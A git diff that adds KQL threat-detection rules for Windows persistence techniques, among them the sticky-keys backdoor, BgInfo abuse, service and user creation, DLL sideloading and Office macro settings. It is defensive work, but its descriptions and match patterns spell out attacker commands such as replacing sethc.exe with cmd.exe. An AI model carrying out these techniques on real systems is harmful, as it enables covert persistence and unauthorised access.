b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql new file mode 100644 index 00000000..1843453b --- /dev/null +++ b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql @@ -0,0 +1,13 @@ +// Title: NET NGenAssemblyUsageLog Registry Key Tamper +// Author: frack113 +// Date: 2022-11-18 +// Level: high +// Description: Detects changes to the NGenAssemblyUsageLog registry key. +.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). +By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog" \ No newline at end of file diff --git a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql new file mode 100644 index 00000000..3fd74516 --- /dev/null +++ b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql @@ -0,0 +1,12 @@ +// Title: NetNTLM Downgrade Attack - Registry +// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT) +// Date: 2018-03-20 +// Level: high +// Description: Detects NetNTLM downgrade attack +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112 +// False Positives: +// - Services or tools that set the values to more restrictive values + +DeviceRegistryEvents +| where (RegistryKey endswith "SYSTEM*" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\lmcompatibilitylevel") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000010)", "DWORD (0x00000020)", "DWORD (0x00000030)")) and RegistryKey endswith "\\NtlmMinClientSec") or RegistryKey endswith "\\RestrictSendingNTLMTraffic") \ No newline at end of file diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql new file mode 100644 index 00000000..470e3da8 --- /dev/null +++ b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql @@ -0,0 +1,12 @@ +// Title: New BgInfo.EXE Custom DB Path Registry Configuration +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: medium +// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of external DB to save the results + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql new file mode 100644 index 00000000..1b5c6e76 --- /dev/null +++ b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql @@ -0,0 +1,12 @@ +// Title: New BgInfo.EXE Custom VBScript Registry Configuration +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: medium +// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate VBScript + +DeviceRegistryEvents +| where RegistryValueData startswith "4" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql new file mode 100644 index 00000000..0de9fa9b --- /dev/null +++ b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql @@ -0,0 +1,12 @@ +// Title: New BgInfo.EXE Custom WMI Query Registry Configuration +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: medium +// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate WMI query + +DeviceRegistryEvents +| where RegistryValueData startswith "6" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql new file mode 100644 index 00000000..8ecf6644 --- /dev/null +++ b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql @@ -0,0 +1,12 @@ +// Title: New Kernel Driver Via SC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-14 +// Level: medium +// Description: Detects creation of a new service (kernel driver) with the type "kernel" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Rare legitimate installation of kernel drivers via sc.exe + +DeviceProcessEvents +| where ((ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe") and (not(((ProcessCommandLine contains "create netprotection_network_filter" and ProcessCommandLine contains "type= kernel start= " and ProcessCommandLine contains "binPath= System32\\drivers\\netprotection_network_filter" and ProcessCommandLine contains "DisplayName= netprotection_network_filter" and ProcessCommandLine contains "group= PNP_TDI tag= yes") or (ProcessCommandLine contains "create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys" and ProcessCommandLine contains "type=kernel start=boot error=critical group=Early-Launch")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_odbc_driver_registered.kql b/KQL/rules/Persistence/new_odbc_driver_registered.kql new file mode 100644 index 00000000..e2ff7413 --- /dev/null +++ b/KQL/rules/Persistence/new_odbc_driver_registered.kql @@ -0,0 +1,12 @@ +// Title: New ODBC Driver Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-23 +// Level: low +// Description: Detects the registration of a new ODBC driver. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Likely + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey endswith "\\SQL Server*"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_service_creation_using_powershell.kql b/KQL/rules/Persistence/new_service_creation_using_powershell.kql new file mode 100644 index 00000000..9ff9349e --- /dev/null +++ b/KQL/rules/Persistence/new_service_creation_using_powershell.kql @@ -0,0 +1,13 @@ +// Title: New Service Creation Using PowerShell +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2023-02-20 +// Level: low +// Description: Detects the creation of a new service using powershell. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Legitimate administrator or user creates a service for legitimate reasons. +// - Software installation + +DeviceProcessEvents +| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql new file mode 100644 index 00000000..b052820a --- /dev/null +++ b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql @@ -0,0 +1,13 @@ +// Title: New Service Creation Using Sc.EXE +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2023-02-20 +// Level: low +// Description: Detects the creation of a new service using the "sc.exe" utility. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Legitimate administrator or user creates a service for legitimate reasons. +// - Software installation + +DeviceProcessEvents +| where ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe") and (not((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql new file mode 100644 index 00000000..7b2543b6 --- /dev/null +++ b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql @@ -0,0 +1,13 @@ +// Title: New TimeProviders Registered With Uncommon DLL Name +// Author: frack113 +// Date: 2022-06-19 +// Level: high +// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. +Adversaries may abuse time providers to execute DLLs when the system boots. +The Windows Time service (W32Time) enables time synchronization across and within domains. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003 + +DeviceRegistryEvents +| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe.kql b/KQL/rules/Persistence/new_user_created_via_net_exe.kql new file mode 100644 index 00000000..1f789bc2 --- /dev/null +++ b/KQL/rules/Persistence/new_user_created_via_net_exe.kql @@ -0,0 +1,13 @@ +// Title: New User Created Via Net.EXE +// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community) +// Date: 2018-10-30 +// Level: medium +// Description: Identifies the creation of local users via the net.exe command. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 +// False Positives: +// - Legitimate user creation. +// - Better use event IDs for user creation rather than command line rules. + +DeviceProcessEvents +| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql new file mode 100644 index 00000000..65940bab --- /dev/null +++ b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql @@ -0,0 +1,12 @@ +// Title: New User Created Via Net.EXE With Never Expire Option +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-12 +// Level: high +// Description: Detects creation of local users via the net.exe command with the option "never expire" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql new file mode 100644 index 00000000..c75228b3 --- /dev/null +++ b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql @@ -0,0 +1,10 @@ +// Title: Non-privileged Usage of Reg or Powershell +// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community +// Date: 2020-10-05 +// Level: high +// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/office_application_startup_office_test.kql b/KQL/rules/Persistence/office_application_startup_office_test.kql new file mode 100644 index 00000000..0afb47c7 --- /dev/null +++ b/KQL/rules/Persistence/office_application_startup_office_test.kql @@ -0,0 +1,12 @@ +// Title: Office Application Startup - Office Test +// Author: omkar72 +// Date: 2020-10-25 +// Level: medium +// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf" \ No newline at end of file diff --git a/KQL/rules/Persistence/office_macros_warning_disabled.kql b/KQL/rules/Persistence/office_macros_warning_disabled.kql new file mode 100644 index 00000000..73dc8242 --- /dev/null +++ b/KQL/rules/Persistence/office_macros_warning_disabled.kql @@ -0,0 +1,12 @@ +// Title: Office Macros Warning Disabled +// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-22 +// Level: high +// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings" \ No newline at end of file diff --git a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql new file mode 100644 index 00000000..474820dd --- /dev/null +++ b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql @@ -0,0 +1,10 @@ +// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file diff --git a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql new file mode 100644 index 00000000..2c548b80 --- /dev/null +++ b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql @@ -0,0 +1,12 @@ +// Title: Outlook Security Settings Updated - Registry +// Author: frack113 +// Date: 2021-12-28 +// Level: medium +// Description: Detects changes to the registry values related to outlook security settings +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative activity + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*" \ No newline at end of file diff --git a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql new file mode 100644 index 00000000..68500c23 --- /dev/null +++ b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql @@ -0,0 +1,12 @@ +// Title: Path To Screensaver Binary Modified +// Author: Bartlomiej Czyz @bczyz1, oscd.community +// Date: 2020-10-11 +// Level: medium +// Description: Detects value modification of registry key containing path to binary used as screensaver. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 +// False Positives: +// - Legitimate modification of screensaver + +DeviceRegistryEvents +| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql new file mode 100644 index 00000000..54c2e904 --- /dev/null +++ b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql @@ -0,0 +1,16 @@ +// Title: Persistence Via Disk Cleanup Handler - Autorun +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. +The disk cleanup manager is part of the operating system. +It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. + +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql new file mode 100644 index 00000000..f18dc1a9 --- /dev/null +++ b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql @@ -0,0 +1,12 @@ +// Title: Persistence Via Hhctrl.ocx +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx")) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql new file mode 100644 index 00000000..84398537 --- /dev/null +++ b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql @@ -0,0 +1,12 @@ +// Title: Persistence Via New SIP Provider +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003 +// False Positives: +// - Legitimate SIP being registered by the OS or different software. + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql new file mode 100644 index 00000000..7b53e8cb --- /dev/null +++ b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql @@ -0,0 +1,14 @@ +// Title: Persistence Via Sticky Key Backdoor +// Author: Sreeman +// Date: 2020-02-18 +// Level: critical +// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. +When the sticky keys are "activated" the privilleged shell is launched. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql new file mode 100644 index 00000000..84f7d7e0 --- /dev/null +++ b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql @@ -0,0 +1,10 @@ +// Title: Persistence Via TypedPaths - CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: medium +// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceProcessEvents +| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" \ No newline at end of file diff --git a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql new file mode 100644 index 00000000..8b970fc6 --- /dev/null +++ b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql @@ -0,0 +1,10 @@ +// Title: Possible Privilege Escalation via Weak Service Permissions +// Author: Teymur Kheirkhabarov +// Date: 2019-10-26 +// Level: high +// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\sc.exe" and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql new file mode 100644 index 00000000..0775aeb7 --- /dev/null +++ b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential appverifUI.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: high +// Description: Detects potential DLL sideloading of "appverifUI.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql new file mode 100644 index 00000000..67190992 --- /dev/null +++ b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential AVKkid.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential DLL sideloading of "AVKkid.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql new file mode 100644 index 00000000..336bfe26 --- /dev/null +++ b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql @@ -0,0 +1,14 @@ +// Title: Potential Azure Browser SSO Abuse +// Author: Den Iuzvyk +// Date: 2020-07-15 +// Level: low +// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. +An attacker can use this to authenticate to Azure AD in a browser as that user. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity + +DeviceImageLoadEvents +| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql new file mode 100644 index 00000000..91e07edd --- /dev/null +++ b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql @@ -0,0 +1,12 @@ +// Title: Potential Binary Or Script Dropper Via PowerShell +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-17 +// Level: medium +// Description: Detects PowerShell creating a binary executable or a script file. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not(((FolderPath endswith "\\Microsoft.PackageManagement.NuGetProvider.dll" and FolderPath startswith "C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\") or ((FolderPath endswith ".dll" or FolderPath endswith ".exe") and (FolderPath startswith "C:\\Windows\\Temp\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\")) or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Users\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql 